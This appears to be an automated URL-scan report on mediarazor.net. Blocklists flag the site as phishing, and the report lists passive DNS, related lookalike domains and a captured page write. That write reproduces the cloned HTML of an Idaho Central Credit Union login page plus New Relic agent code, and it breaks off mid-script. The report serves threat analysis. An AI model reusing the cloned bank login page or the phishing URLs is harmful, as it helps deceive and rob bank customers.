Overview

URL mediarazor.net/?e=/
IP192.185.141.13
ASNUNIFIEDLAYER-AS-1
Location United States
Report completed2022-09-26 14:11:34 UTC
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-09-26 2 mediarazor.net/?e=/ Phishing
2022-09-26 2 mediarazor.net/VideoChat/Face_to_Face/ServiceAgent/MobileDevice/actions.js Phishing
2022-09-26 2 mediarazor.net/BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/app- (...) Phishing
2022-09-26 2 mediarazor.net/BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/goog (...) Phishing
2022-09-26 2 mediarazor.net/BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/1ca8 (...) Phishing
2022-09-26 2 mediarazor.net/BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/KFOm (...) Phishing
2022-09-26 2 mediarazor.net/BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/Alka (...) Phishing
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

No files detected



Passive DNS (19)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
mnemonic passive DNS 1.b406929acabac9b095f124c81bdfcf57f.com (2) 75277 2020-11-23 09:04:27 UTC 2022-09-26 05:36:32 UTC 54.230.111.12
mnemonic passive DNS contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-09-26 04:28:07 UTC 34.117.237.239
mnemonic passive DNS code.jquery.com (2) 634 2012-05-21 17:28:02 UTC 2022-09-26 04:31:10 UTC 69.16.175.10
mnemonic passive DNS ajax.aspnetcdn.com (1) 693 2012-05-24 13:35:31 UTC 2022-09-26 04:51:00 UTC 152.199.19.160
mnemonic passive DNS ocsp.sectigo.com (2) 487 2018-12-17 11:31:55 UTC 2022-09-26 08:59:13 UTC 172.64.155.188
mnemonic passive DNS img-getpocket.cdn.mozilla.net (6) 1631 2017-09-01 03:40:57 UTC 2022-09-26 04:43:33 UTC 34.120.237.76
mnemonic passive DNS stackpath.bootstrapcdn.com (1) 2467 2018-04-05 04:41:29 UTC 2022-09-26 07:54:32 UTC 104.18.11.207
mnemonic passive DNS r3.o.lencr.org (6) 344 2020-12-02 08:52:13 UTC 2022-09-26 04:35:11 UTC 23.36.76.226
mnemonic passive DNS content-signature-2.cdn.mozilla.net (1) 1152 2020-11-03 12:26:46 UTC 2022-09-26 04:26:56 UTC 143.204.55.110
mnemonic passive DNS wup-1ca8ebd0.us.v2.we-stats.com (3) 225817 2022-03-15 17:31:46 UTC 2022-09-26 09:13:31 UTC 52.141.217.134
mnemonic passive DNS 1.c81358859121583b7adf2ace89cb39f44.com (2) 75217 2020-11-23 09:04:27 UTC 2022-09-26 10:48:44 UTC 54.230.111.34
mnemonic passive DNS ocsp.digicert.com (3) 86 2012-05-21 07:02:23 UTC 2022-09-26 10:05:36 UTC 93.184.220.29
mnemonic passive DNS ocsp.godaddy.com (1) 698 2012-05-20 19:28:57 UTC 2022-09-26 04:29:02 UTC 192.124.249.23
mnemonic passive DNS cdnjs.cloudflare.com (2) 235 2020-10-20 10:17:36 UTC 2022-09-26 06:09:43 UTC 104.17.25.14
mnemonic passive DNS push.services.mozilla.com (1) 2140 2015-09-03 10:29:36 UTC 2022-09-26 05:45:55 UTC 54.149.28.179
mnemonic passive DNS 1.a79ab95c1589a13f8a4cab612bc71f9f7.com (2) 75111 2020-11-23 09:04:27 UTC 2022-09-26 10:48:44 UTC 54.230.111.22
mnemonic passive DNS log-1ca8ebd0.us.v2.we-stats.com (1) 234327 2022-03-15 17:31:50 UTC 2022-09-26 09:13:34 UTC 52.238.253.184
mnemonic passive DNS firefox.settings.services.mozilla.com (2) 867 2020-05-28 17:26:30 UTC 2022-09-26 08:18:12 UTC 143.204.55.35
mnemonic passive DNS mediarazor.net (23) 0 2021-02-02 21:42:04 UTC 2022-09-21 23:02:05 UTC 192.185.141.13 Unknown ranking


Recent reports on same IP/ASN/Domain/Screenshot

Last 1 reports on IP: 192.185.141.13

Date UQ / IDS / BL URL IP
2022-09-26 14:11:34 +0000
0 - 0 - 7 mediarazor.net/?e=/ 192.185.141.13

Last 5 reports on ASN: UNIFIEDLAYER-AS-1

Date UQ / IDS / BL URL IP
2022-11-28 22:01:26 +0000
0 - 0 - 4 xeratti.com/ 162.241.252.212
2022-11-28 21:59:45 +0000
18 - 0 - 14 delivery.imaginedbyjess.co/public/mUA0Hrdbwv9 (...) 192.232.249.125
2022-11-28 21:36:13 +0000
0 - 0 - 1 implantdentistry.com.au/ 192.254.212.10
2022-11-28 21:35:31 +0000
0 - 0 - 3 loginnorthlane.org/ 162.241.124.47
2022-11-28 21:29:20 +0000
0 - 0 - 1 eegeq.paradoxholdingsllc.com/aHR0cHM6Ly9icmFu (...) 69.49.229.176

Last 1 reports on domain: mediarazor.net

Date UQ / IDS / BL URL IP
2022-09-26 14:11:34 +0000
0 - 0 - 7 mediarazor.net/?e=/ 192.185.141.13

Last 5 reports with similar screenshot

Date UQ / IDS / BL URL IP
2022-11-28 16:40:35 +0000
9 - 0 - 2 dircetdebit.xyz/myebranch/lccu.com/review/ 69.57.162.19
2022-11-28 16:39:51 +0000
9 - 0 - 1 dircetdebit.xyz/myebranch/lccu.com/review 69.57.162.19
2022-11-28 09:23:25 +0000
9 - 0 - 0 dircetdebit.xyz/myebranch/lccu.com/review/ 69.57.162.19
2022-11-28 09:23:23 +0000
9 - 0 - 0 dircetdebit.xyz/myebranch/lccu.com/review 69.57.162.19
2022-09-18 17:47:57 +0000
0 - 0 - 7 lgnaogaon.com/mylccu.com/review/ 54.36.167.15


JavaScript

Executed Scripts (13)


Executed Evals (0)


Executed Writes (1)

#1 JavaScript::Write (size: 87102, repeated: 1) - SHA256: 8eefaa69691ac204f569d17c2b1f7cd3933121c5c731c7893af254af8db6e7a0

                                        < !DOCTYPE html >
    < html data - mobile - page = ""
class = "js-focus-visible"
data - scrapbook - source = "https://myebranch.iccu.com/mobile/Authentication"
data - scrapbook - create = "20220724194003440"
data - scrapbook - title = "Idaho Central Credit Union"
lang = "en-US" >
    < head >
    < style > body {
        transition: opacity ease - in 0.2 s;
    }
body[unresolved] {
    opacity: 0;display: block;overflow: hidden;position: relative;
} < /style> < link rel = "apple-touch-icon"
sizes = "60x60"
href = "https://assets.orb.alkamitech.com/production/themesets/e6d119d9-48fc-4426-9c07-4a93bffa8838/themes/legacy/iccu/Favicons/apple-touch-icon-60x60.png" >
    < link rel = "apple-touch-icon"
sizes = "76x76"
href = "https://assets.orb.alkamitech.com/production/themesets/e6d119d9-48fc-4426-9c07-4a93bffa8838/themes/legacy/iccu/Favicons/apple-touch-icon-76x76.png" >
    < link rel = "apple-touch-icon"
sizes = "120x120"
href = "https://assets.orb.alkamitech.com/production/themesets/e6d119d9-48fc-4426-9c07-4a93bffa8838/themes/legacy/iccu/Favicons/apple-touch-icon-120x120.png" >
    < link rel = "apple-touch-icon"
sizes = "152x152"
href = "https://assets.orb.alkamitech.com/production/themesets/e6d119d9-48fc-4426-9c07-4a93bffa8838/themes/legacy/iccu/Favicons/apple-touch-icon-152x152.png" >
    < link rel = "apple-touch-icon"
sizes = "180x180"
href = "https://assets.orb.alkamitech.com/production/themesets/e6d119d9-48fc-4426-9c07-4a93bffa8838/themes/legacy/iccu/Favicons/apple-touch-icon-180x180.png" >
    < link rel = "icon"
type = "image/png"
sizes = "32x32"
href = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/favicon-32x32.png" >
    < link rel = "icon"
type = "image/png"
sizes = "192x192"
href = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/android-chrome-192x192.png" >
    < link rel = "icon"
type = "image/png"
sizes = "16x16"
href = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/favicon-16x16.png" >
    < link rel = "manifest"
href = "https://assets.orb.alkamitech.com/production/themesets/e6d119d9-48fc-4426-9c07-4a93bffa8838/themes/legacy/iccu/Favicons/site.webmanifest" >
    < link rel = "mask-icon"
href = "https://assets.orb.alkamitech.com/production/themesets/e6d119d9-48fc-4426-9c07-4a93bffa8838/themes/legacy/iccu/Favicons/safari-pinned-tab.svg"
color = "true" >
    < link rel = "shortcut icon"
href = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/favicon.ico" >
    < meta name = "msapplication-TileColor"
content = "true" >
    < meta name = "msapplication-TileImage"
content = "https://assets.orb.alkamitech.com/production/themesets/e6d119d9-48fc-4426-9c07-4a93bffa8838/themes/legacy/iccu/Favicons/mstile-144x144.png" >
    < meta name = "msapplication-config"
content = "https://assets.orb.alkamitech.com/production/themesets/e6d119d9-48fc-4426-9c07-4a93bffa8838/themes/legacy/iccu/Favicons/browserconfig.xml" >
    < meta name = "theme-color"
content = "true" >
    <!--
    < script type = "text/javascript"
src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/aec7706684" > < /script> < script src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/nr-1216.min.js" > < /script> < script type = "text/javascript"
async src = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/vms.js" > < /script> < script >
    var _isAuthenticated = 'False'.toLowerCase(); < /script>
-->
< link href = "BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/font-icons.css"
rel = "stylesheet"
type = "text/css" >
    < title > Idaho Central Credit Union < /title> < meta name = "viewport"
content = "width=device-width, initial-scale=1.0, user-scalable=yes" >
    < meta http - equiv = "Content-type"
content = "text/html; charset=UTF-8" >
    <!--
    < script type = "text/javascript" > window.NREUM || (NREUM = {});
NREUM.info = {
    "beacon": "bam.nr-data.net",
    "errorBeacon": "bam.nr-data.net",
    "licenseKey": "aec7706684",
    "applicationID": "146219323",
    "transactionName": "MlVRZUoCW0ZZBUdcXAsffmd7THhaWg9fUHIQRFtUVhdcVlkSWlpdJl9dRUoMWVldFBx8XQFVSw==",
    "queueTime": 0,
    "applicationTime": 109,
    "agent": "",
    "atts": ""
} < /script> < script type = "text/javascript" > (window.NREUM || (NREUM = {})).init = {
    ajax: {
        deny_list: ["bam.nr-data.net"]
    }
};
(window.NREUM || (NREUM = {})).loader_config = {
    xpid: "VgABWFdUGwIEUlNTDgIFVQ==",
    licenseKey: "aec7706684",
    applicationID: "146219323"
};
window.NREUM || (NREUM = {}), __nr_require = function(t, e, n) {
    function r(n) {
        if (!e[n]) {
            var i = e[n] = {
                exports: {}
            };
            t[n][0].call(i.exports, function(e) {
                var i = t[n][1][e];
                return r(i || e)
            }, i, i.exports)
        }
        return e[n].exports
    }
    if ("function" == typeof __nr_require) return __nr_require;
    for (var i = 0; i < n.length; i++) r(n[i]);
    return r
}({
    1: [function(t, e, n) {
        function r(t) {
            try {
                s.console && console.log(t)
            } catch (e) {}
        }
        var i, o = t("ee"),
            a = t(27),
            s = {};
        try {
            i = localStorage.getItem("__nr_flags").split(","), console && "function" == typeof console.log && (s.console = !0, i.indexOf("dev") !== -1 && (s.dev = !0), i.indexOf("nr_dev") !== -1 && (s.nrDev = !0))
        } catch (c) {}
        s.nrDev && o.on("internal-error", function(t) {
            r(t.stack)
        }), s.dev && o.on("fn-err", function(t, e, n) {
            r(n.stack)
        }), s.dev && (r("NR AGENT IN DEVELOPMENT MODE"), r("flags: " + a(s, function(t, e) {
            return t
        }).join(", ")))
    }, {}],
    2: [function(t, e, n) {
        function r(t, e, n, r, s) {
            try {
                p ? p -= 1 : i(s || new UncaughtException(t, e, n), !0)
            } catch (f) {
                try {
                    o("ierr", [f, c.now(), !0])
                } catch (d) {}
            }
            return "function" == typeof u && u.apply(this, a(arguments))
        }

        function UncaughtException(t, e, n) {
            this.message = t || "Uncaught error with no additional information", this.sourceURL = e, this.line = n
        }

        function i(t, e) {
            var n = e ? null : c.now();
            o("err", [t, n])
        }
        var o = t("handle"),
            a = t(28),
            s = t("ee"),
            c = t("loader"),
            f = t("gos"),
            u = window.onerror,
            d = !1,
            l = "nr@seenError";
        if (!c.disabled) {
            var p = 0;
            c.features.err = !0, t(1), window.onerror = r;
            try {
                throw new Error
            } catch (h) {
                "stack" in h && (t(10), t(9), "addEventListener" in window && t(6), c.xhrWrappable && t(11), d = !0)
            }
            s.on("fn-start", function(t, e, n) {
                d && (p += 1)
            }), s.on("fn-err", function(t, e, n) {
                d && !n[l] && (f(n, l, function() {
                    return !0
                }), this.thrown = !0, i(n))
            }), s.on("fn-end", function() {
                d && !this.thrown && p > 0 && (p -= 1)
            }), s.on("internal-error", function(t) {
                o("ierr", [t, c.now(), !0])
            })
        }
    }, {}],
    3: [function(t, e, n) {
        var r = t("loader");
        r.disabled || (r.features.ins = !0)
    }, {}],
    4: [function(t, e, n) {
        function r() {
            var t = new PerformanceObserver(function(t, e) {
                var n = t.getEntries();
                s(v, [n])
            });
            try {
                t.observe({
                    entryTypes: ["resource"]
                })
            } catch (e) {}
        }

        function i(t) {
            if (s(v, [window.performance.getEntriesByType(w)]), window.performance["c" + l]) try {
                window.performance[h](m, i, !1)
            } catch (t) {} else try {
                window.performance[h]("webkit" + m, i, !1)
            } catch (t) {}
        }

        function o(t) {}
        if (window.performance && window.performance.timing && window.performance.getEntriesByType) {
            var a = t("ee"),
                s = t("handle"),
                c = t(10),
                f = t(9),
                u = t(5),
                d = t(19),
                l = "learResourceTimings",
                p = "addEventListener",
                h = "removeEventListener",
                m = "resourcetimingbufferfull",
                v = "bstResource",
                w = "resource",
                g = "-start",
                y = "-end",
                x = "fn" + g,
                b = "fn" + y,
                E = "bstTimer",
                R = "pushState",
                S = t("loader");
            if (!S.disabled) {
                S.features.stn = !0, t(8), "addEventListener" in window && t(6);
                var O = NREUM.o.EV;
                a.on(x, function(t, e) {
                    var n = t[0];
                    n instanceof O && (this.bstStart = S.now())
                }), a.on(b, function(t, e) {
                    var n = t[0];
                    n instanceof O && s("bst", [n, e, this.bstStart, S.now()])
                }), c.on(x, function(t, e, n) {
                    this.bstStart = S.now(), this.bstType = n
                }), c.on(b, function(t, e) {
                    s(E, [e, this.bstStart, S.now(), this.bstType])
                }), f.on(x, function() {
                    this.bstStart = S.now()
                }), f.on(b, function(t, e) {
                    s(E, [e, this.bstStart, S.now(), "requestAnimationFrame"])
                }), a.on(R + g, function(t) {
                    this.time = S.now(), this.startPath = location.pathname + location.hash
                }), a.on(R + y, function(t) {
                    s("bstHist", [location.pathname + location.hash, this.startPath, this.time])
                }), u() ? (s(v, [window.performance.getEntriesByType("resource")]), r()) : p in window.performance && (window.performance["c" + l] ? window.performance[p](m, i, d(!1)) : window.performance[p]("webkit" + m, i, d(!1))), document[p]("scroll", o, d(!1)), document[p]("keypress", o, d(!1)), document[p]("click", o, d(!1))
            }
        }
    }, {}],
    5: [function(t, e, n) {
        e.exports = function() {
            return "PerformanceObserver" in window && "function" == typeof window.PerformanceObserver
        }
    }, {}],
    6: [function(t, e, n) {
        function r(t) {
            for (var e = t; e && !e.hasOwnProperty(u);) e = Object.getPrototypeOf(e);
            e && i(e)
        }

        function i(t) {
            s.inPlace(t, [u, d], "-", o)
        }

        function o(t, e) {
            return t[1]
        }
        var a = t("ee").get("events"),
            s = t("wrap-function")(a, !0),
            c = t("gos"),
            f = XMLHttpRequest,
            u = "addEventListener",
            d = "removeEventListener";
        e.exports = a, "getPrototypeOf" in Object ? (r(document), r(window), r(f.prototype)) : f.prototype.hasOwnProperty(u) && (i(window), i(f.prototype)), a.on(u + "-start", function(t, e) {
            var n = t[1];
            if (null !== n && ("function" == typeof n || "object" == typeof n)) {
                var r = c(n, "nr@wrapped", function() {
                    function t() {
                        if ("function" == typeof n.handleEvent) return n.handleEvent.apply(n, arguments)
                    }
                    var e = {
                        object: t,
                        "function": n
                    }[typeof n];
                    return e ? s(e, "fn-", null, e.name || "anonymous") : n
                });
                this.wrapped = t[1] = r
            }
        }), a.on(d + "-start", function(t) {
            t[1] = this.wrapped || t[1]
        })
    }, {}],
    7: [function(t, e, n) {
        function r(t, e, n) {
            var r = t[e];
            "function" == typeof r && (t[e] = function() {
                var t = o(arguments),
                    e = {};
                i.emit(n + "before-start", [t], e);
                var a;
                e[m] && e[m].dt && (a = e[m].dt);
                var s = r.apply(this, t);
                return i.emit(n + "start", [t, a], s), s.then(function(t) {
                    return i.emit(n + "end", [null, t], s), t
                }, function(t) {
                    throw i.emit(n + "end", [t], s), t
                })
            })
        }
        var i = t("ee").get("fetch"),
            o = t(28),
            a = t(27);
        e.exports = i;
        var s = window,
            c = "fetch-",
            f = c + "body-",
            u = ["arrayBuffer", "blob", "json", "text", "formData"],
            d = s.Request,
            l = s.Response,
            p = s.fetch,
            h = "prototype",
            m = "nr@context";
        d && l && p && (a(u, function(t, e) {
            r(d[h], e, f), r(l[h], e, f)
        }), r(s, "fetch", c), i.on(c + "end", function(t, e) {
            var n = this;
            if (e) {
                var r = e.headers.get("content-length");
                null !== r && (n.rxSize = r), i.emit(c + "done", [null, e], n)
            } else i.emit(c + "done", [t], n)
        }))
    }, {}],
    8: [function(t, e, n) {
        var r = t("ee").get("history"),
            i = t("wrap-function")(r);
        e.exports = r;
        var o = window.history && window.history.constructor && window.history.constructor.prototype,
            a = window.history;
        o && o.pushState && o.replaceState && (a = o), i.inPlace(a, ["pushState", "replaceState"], "-")
    }, {}],
    9: [function(t, e, n) {
        var r = t("ee").get("raf"),
            i = t("wrap-function")(r),
            o = "equestAnimationFrame";
        e.exports = r, i.inPlace(window, ["r" + o, "mozR" + o, "webkitR" + o, "msR" + o], "raf-"), r.on("raf-start", function(t) {
            t[0] = i(t[0], "fn-")
        })
    }, {}],
    10: [function(t, e, n) {
        function r(t, e, n) {
            t[0] = a(t[0], "fn-", null, n)
        }

        function i(t, e, n) {
            this.method = n, this.timerDuration = isNaN(t[1]) ? 0 : +t[1], t[0] = a(t[0], "fn-", this, n)
        }
        var o = t("ee").get("timer"),
            a = t("wrap-function")(o),
            s = "setTimeout",
            c = "setInterval",
            f = "clearTimeout",
            u = "-start",
            d = "-";
        e.exports = o, a.inPlace(window, [s, "setImmediate"], s + d), a.inPlace(window, [c], c + d), a.inPlace(window, [f, "clearImmediate"], f + d), o.on(c + u, r), o.on(s + u, i)
    }, {}],
    11: [function(t, e, n) {
        function r(t, e) {
            d.inPlace(e, ["onreadystatechange"], "fn-", s)
        }

        function i() {
            var t = this,
                e = u.context(t);
            t.readyState > 3 && !e.resolved && (e.resolved = !0, u.emit("xhr-resolved", [], t)), d.inPlace(t, y, "fn-", s)
        }

        function o(t) {
            x.push(t), m && (E ? E.then(a) : w ? w(a) : (R = -R, S.data = R))
        }

        function a() {
            for (var t = 0; t < x.length; t++) r([], x[t]);
            x.length && (x = [])
        }

        function s(t, e) {
            return e
        }

        function c(t, e) {
            for (var n in t) e[n] = t[n];
            return e
        }
        t(6);
        var f = t("ee"),
            u = f.get("xhr"),
            d = t("wrap-function")(u),
            l = t(19),
            p = NREUM.o,
            h = p.XHR,
            m = p.MO,
            v = p.PR,
            w = p.SI,
            g = "readystatechange",
            y = ["onload", "onerror", "onabort", "onloadstart", "onloadend", "onprogress", "ontimeout"],
            x = [];
        e.exports = u;
        var b = window.XMLHttpRequest = function(t) {
            var e = new h(t);
            try {
                u.emit("new-xhr", [e], e), e.addEventListener(g, i, l(!1))
            } catch (n) {
                try {
                    u.emit("internal-error", [n])
                } catch (r) {}
            }
            return e
        };
        if (c(h, b), b.prototype = h.prototype, d.inPlace(b.prototype, ["open", "send"], "-xhr-", s), u.on("send-xhr-start", function(t, e) {
                r(t, e), o(e)
            }), u.on("open-xhr-start", r), m) {
            var E = v && v.resolve();
            if (!w && !v) {
                var R = 1,
                    S = document.createTextNode(R);
                new m(a).observe(S, {
                    characterData: !0
                })
            }
        } else f.on("fn-end", function(t) {
            t[0] && t[0].type === g || a()
        })
    }, {}],
    12: [function(t, e, n) {
        function r(t) {
            if (!s(t)) return null;
            var e = window.NREUM;
            if (!e.loader_config) return null;
            var n = (e.loader_config.accountID || "").toString() || null,
                r = (e.loader_config.agentID || "").toString() || null,
                f = (e.loader_config.trustKey || "").toString() || null;
            if (!n || !r) return null;
            var h = p.generateSpanId(),
                m = p.generateTraceId(),
                v = Date.now(),
                w = {
                    spanId: h,
                    traceId: m,
                    timestamp: v
                };
            return (t.sameOrigin || c(t) && l()) && (w.traceContextParentHeader = i(h, m), w.traceContextStateHeader = o(h, v, n, r, f)), (t.sameOrigin && !u() || !t.sameOrigin && c(t) && d()) && (w.newrelicHeader = a(h, m, v, n, r, f)), w
        }

        function i(t, e) {
            return "00-" + e + "-" + t + "-01"
        }

        function o(t, e, n, r, i) {
            var o = 0,
                a = "",
                s = 1,
                c = "",
                f = "";
            return i + "@nr=" + o + "-" + s + "-" + n + "-" + r + "-" + t + "-" + a + "-" + c + "-" + f + "-" + e
        }

        function a(t, e, n, r, i, o) {
            var a = "btoa" in window && "function" == typeof window.btoa;
            if (!a) return null;
            var s = {
                v: [0, 1],
                d: {
                    ty: "Browser",
                    ac: r,
                    ap: i,
                    id: t,
                    tr: e,
                    ti: n
                }
            };
            return o && r !== o && (s.d.tk = o), btoa(JSON.stringify(s))
        }

        function s(t) {
            return f() && c(t)
        }

        function c(t) {
            var e = !1,
                n = {};
            if ("init" in NREUM && "distributed_tracing" in NREUM.init && (n = NREUM.init.distributed_tracing), t.sameOrigin) e = !0;
            else if (n.allowed_origins instanceof Array)
                for (var r = 0; r < n.allowed_origins.length; r++) {
                    var i = h(n.allowed_origins[r]);
                    if (t.hostname === i.hostname && t.protocol === i.protocol && t.port === i.port) {
                        e = !0;
                        break
                    }
                }
            return e
        }

        function f() {
            return "init" in NREUM && "distributed_tracing" in NREUM.init && !!NREUM.init.distributed_tracing.enabled
        }

        function u() {
            return "init" in NREUM && "distributed_tracing" in NREUM.init && !!NREUM.init.distributed_tracing.exclude_newrelic_header
        }

        function d() {
            return "init" in NREUM && "distributed_tracing" in NREUM.init && NREUM.init.distributed_tracing.cors_use_newrelic_header !== !1
        }

        function l() {
            return "init" in NREUM && "distributed_tracing" in NREUM.init && !!NREUM.init.distributed_tracing.cors_use_tracecontext_headers
        }
        var p = t(24),
            h = t(14);
        e.exports = {
            generateTracePayload: r,
            shouldGenerateTrace: s
        }
    }, {}],
    13: [function(t, e, n) {
        function r(t) {
            var e = this.params,
                n = this.metrics;
            if (!this.ended) {
                this.ended = !0;
                for (var r = 0; r < l; r++) t.removeEventListener(d[r], this.listener, !1);
                return e.protocol && "data" === e.protocol ? void g("Ajax/DataUrl/Excluded") : void(e.aborted || (n.duration = a.now() - this.startTime, this.loadCaptureCalled || 4 !== t.readyState ? null == e.status && (e.status = 0) : o(this, t), n.cbTime = this.cbTime, s("xhr", [e, n, this.startTime, this.endTime, "xhr"], this)))
            }
        }

        function i(t, e) {
            var n = c(e),
                r = t.params;
            r.hostname = n.hostname, r.port = n.port, r.protocol = n.protocol, r.host = n.hostname + ":" + n.port, r.pathname = n.pathname, t.parsedOrigin = n, t.sameOrigin = n.sameOrigin
        }

        function o(t, e) {
            t.params.status = e.status;
            var n = v(e, t.lastSize);
            if (n && (t.metrics.rxSize = n), t.sameOrigin) {
                var r = e.getResponseHeader("X-NewRelic-App-Data");
                r && (t.params.cat = r.split(", ").pop())
            }
            t.loadCaptureCalled = !0
        }
        var a = t("loader");
        if (a.xhrWrappable && !a.disabled) {
            var s = t("handle"),
                c = t(14),
                f = t(12).generateTracePayload,
                u = t("ee"),
                d = ["load", "error", "abort", "timeout"],
                l = d.length,
                p = t("id"),
                h = t(20),
                m = t(18),
                v = t(15),
                w = t(19),
                g = t(21).recordSupportability,
                y = NREUM.o.REQ,
                x = window.XMLHttpRequest;
            a.features.xhr = !0, t(11), t(7), u.on("new-xhr", function(t) {
                var e = this;
                e.totalCbs = 0, e.called = 0, e.cbTime = 0, e.end = r, e.ended = !1, e.xhrGuids = {}, e.lastSize = null, e.loadCaptureCalled = !1, e.params = this.params || {}, e.metrics = this.metrics || {}, t.addEventListener("load", function(n) {
                    o(e, t)
                }, w(!1)), h && (h > 34 || h < 10) || t.addEventListener("progress", function(t) {
                    e.lastSize = t.loaded
                }, w(!1))
            }), u.on("open-xhr-start", function(t) {
                this.params = {
                    method: t[0]
                }, i(this, t[1]), this.metrics = {}
            }), u.on("open-xhr-end", function(t, e) {
                "loader_config" in NREUM && "xpid" in NREUM.loader_config && this.sameOrigin && e.setRequestHeader("X-NewRelic-ID", NREUM.loader_config.xpid);
                var n = f(this.parsedOrigin);
                if (n) {
                    var r = !1;
                    n.newrelicHeader && (e.setRequestHeader("newrelic", n.newrelicHeader), r = !0), n.traceContextParentHeader && (e.setRequestHeader("traceparent", n.traceContextParentHeader), n.traceContextStateHeader && e.setRequestHeader("tracestate", n.traceContextStateHeader), r = !0), r && (this.dt = n)
                }
            }), u.on("send-xhr-start", function(t, e) {
                var n = this.metrics,
                    r = t[0],
                    i = this;
                if (n && r) {
                    var o = m(r);
                    o && (n.txSize = o)
                }
                this.startTime = a.now(), this.listener = function(t) {
                    try {
                        "abort" !== t.type || i.loadCaptureCalled || (i.params.aborted = !0), ("load" !== t.type || i.called === i.totalCbs && (i.onloadCalled || "function" != typeof e.onload)) && i.end(e)
                    } catch (n) {
                        try {
                            u.emit("internal-error", [n])
                        } catch (r) {}
                    }
                };
                for (var s = 0; s < l; s++) e.addEventListener(d[s], this.listener, w(!1))
            }), u.on("xhr-cb-time", function(t, e, n) {
                this.cbTime += t, e ? this.onloadCalled = !0 : this.called += 1, this.called !== this.totalCbs || !this.onloadCalled && "function" == typeof n.onload || this.end(n)
            }), u.on("xhr-load-added", function(t, e) {
                var n = "" + p(t) + !!e;
                this.xhrGuids && !this.xhrGuids[n] && (this.xhrGuids[n] = !0, this.totalCbs += 1)
            }), u.on("xhr-load-removed", function(t, e) {
                var n = "" + p(t) + !!e;
                this.xhrGuids && this.xhrGuids[n] && (delete this.xhrGuids[n], this.totalCbs -= 1)
            }), u.on("xhr-resolved", function() {
                this.endTime = a.now()
            }), u.on("addEventListener-end", function(t, e) {
                e instanceof x && "load" === t[0] && u.emit("xhr-load-added", [t[1], t[2]], e)
            }), u.on("removeEventListener-end", function(t, e) {
                e instanceof x && "load" === t[0] && u.emit("xhr-load-removed", [t[1], t[2]], e)
            }), u.on("fn-start", function(t, e, n) {
                e instanceof x && ("onload" === n && (this.onload = !0), ("load" === (t[0] && t[0].type) || this.onload) && (this.xhrCbStart = a.now()))
            }), u.on("fn-end", function(t, e) {
                this.xhrCbStart && u.emit("xhr-cb-time", [a.now() - this.xhrCbStart, this.onload, e], e)
            }), u.on("fetch-before-start", function(t) {
                function e(t, e) {
                    var n = !1;
                    return e.newrelicHeader && (t.set("newrelic", e.newrelicHeader), n = !0), e.traceContextParentHeader && (t.set("traceparent", e.traceContextParentHeader), e.traceContextStateHeader && t.set("tracestate", e.traceContextStateHeader), n = !0), n
                }
                var n, r = t[1] || {};
                "string" == typeof t[0] ? n = t[0] : t[0] && t[0].url ? n = t[0].url : window.URL && t[0] && t[0] instanceof URL && (n = t[0].href), n && (this.parsedOrigin = c(n), this.sameOrigin = this.parsedOrigin.sameOrigin);
                var i = f(this.parsedOrigin);
                if (i && (i.newrelicHeader || i.traceContextParentHeader))
                    if ("string" == typeof t[0] || window.URL && t[0] && t[0] instanceof URL) {
                        var o = {};
                        for (var a in r) o[a] = r[a];
                        o.headers = new Headers(r.headers || {}), e(o.headers, i) && (this.dt = i), t.length > 1 ? t[1] = o : t.push(o)
                    } else t[0] && t[0].headers && e(t[0].headers, i) && (this.dt = i)
            }), u.on("fetch-start", function(t, e) {
                this.params = {}, this.metrics = {}, this.startTime = a.now(), this.dt = e, t.length >= 1 && (this.target = t[0]), t.length >= 2 && (this.opts = t[1]);
                var n, r = this.opts || {},
                    o = this.target;
                if ("string" == typeof o ? n = o : "object" == typeof o && o instanceof y ? n = o.url : window.URL && "object" == typeof o && o instanceof URL && (n = o.href), i(this, n), "data" !== this.params.protocol) {
                    var s = ("" + (o && o instanceof y && o.method || r.method || "GET")).toUpperCase();
                    this.params.method = s, this.txSize = m(r.body) || 0
                }
            }), u.on("fetch-done", function(t, e) {
                if (this.endTime = a.now(), this.params || (this.params = {}), "data" === this.params.protocol) return void g("Ajax/DataUrl/Excluded");
                this.params.status = e ? e.status : 0;
                var n;
                "string" == typeof this.rxSize && this.rxSize.length > 0 && (n = +this.rxSize);
                var r = {
                    txSize: this.txSize,
                    rxSize: n,
                    duration: a.now() - this.startTime
                };
                s("xhr", [this.params, r, this.startTime, this.endTime, "fetch"], this)
            })
        }
    }, {}],
    14: [function(t, e, n) {
        var r = {};
        e.exports = function(t) {
            if (t in r) return r[t];
            if (0 === (t || "").indexOf("data:")) return {
                protocol: "data"
            };
            var e = document.createElement("a"),
                n = window.location,
                i = {};
            e.href = t, i.port = e.port;
            var o = e.href.split("://");
            !i.port && o[1] && (i.port = o[1].split("/")[0].split("@").pop().split(":")[1]), i.port && "0" !== i.port || (i.port = "https" === o[0] ? "443" : "80"), i.hostname = e.hostname || n.hostname, i.pathname = e.pathname, i.protocol = o[0], "/" !== i.pathname.charAt(0) && (i.pathname = "/" + i.pathname);
            var a = !e.protocol || ":" === e.protocol || e.protocol === n.protocol,
                s = e.hostname === document.domain && e.port === n.port;
            return i.sameOrigin = a && (!e.hostname || s), "/" === i.pathname && (r[t] = i), i
        }
    }, {}],
    15: [function(t, e, n) {
        function r(t, e) {
            var n = t.responseType;
